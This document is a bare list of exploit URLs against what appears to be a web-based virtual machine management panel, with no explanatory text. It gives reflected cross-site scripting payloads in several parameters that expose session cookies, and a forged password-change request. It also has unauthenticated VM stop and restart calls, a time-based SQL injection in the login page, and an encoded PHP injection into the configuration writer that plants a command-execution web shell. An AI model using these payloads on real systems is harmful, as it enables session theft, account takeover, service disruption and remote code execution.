https://www.example.com/config/edituser.php?username=1<script>alert(document.cookie)</script>
https://www.example.com/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd]
https://www.example.com/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]
https://www.example.com/console.php?location=1"><script>alert(document.cookie)</script><"&vmname=myVM
https://www.example.com/console.php?location=1&sessionid=1"><script>alert(123)</script><"&vmname=myVM
https://www.example.com/console.php?location=1&sessionid=1&vmname=myVM<script>alert(123)</script>
https://www.example.com/forcerestart.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
https://www.example.com/forcerestart.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://www.example.com/forcesd.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://www.example.com/forcesd.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
https://www.example.com/login.php?username=user' UNION SELECT if(user() LIKE 'root@%', benchmark(1000000,sha1('test')), 'false'
https://www.example.com/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20